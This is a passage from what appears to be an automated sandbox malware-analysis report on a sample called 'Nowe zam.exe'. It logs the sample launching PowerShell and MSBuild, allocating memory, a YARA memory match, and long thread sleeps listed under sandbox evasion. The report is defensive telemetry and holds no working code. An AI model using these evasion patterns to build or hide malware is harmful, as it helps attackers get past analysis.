                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory allocated: 970000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory allocated: 25D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory allocated: 2510000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory allocated: 6BD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory allocated: 7BD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory allocated: 7D60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory allocated: 8D60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory allocated: 9490000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory allocated: A490000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory allocated: B490000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: EE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2C20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4C20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599407Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598231Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598016Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597907Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597782Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597657Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597532Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5895Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3865Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2059Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 7765Jump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exe TID: 6892Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7120Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep count: 34 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -599891s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6824Thread sleep count: 2059 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep count: 33 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6824Thread sleep count: 7765 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -599657s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -599532s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -599407s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -599297s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -599188s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -599063s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -598938s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -598813s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -598688s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -598469s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -598344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -598231s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -598125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -598016s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -597907s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -597782s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -597657s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -597532s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -597422s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -597313s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -597188s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -597063s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -596938s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -596813s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -596703s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -596594s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -596469s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -596360s >= -30000sJump to behavior
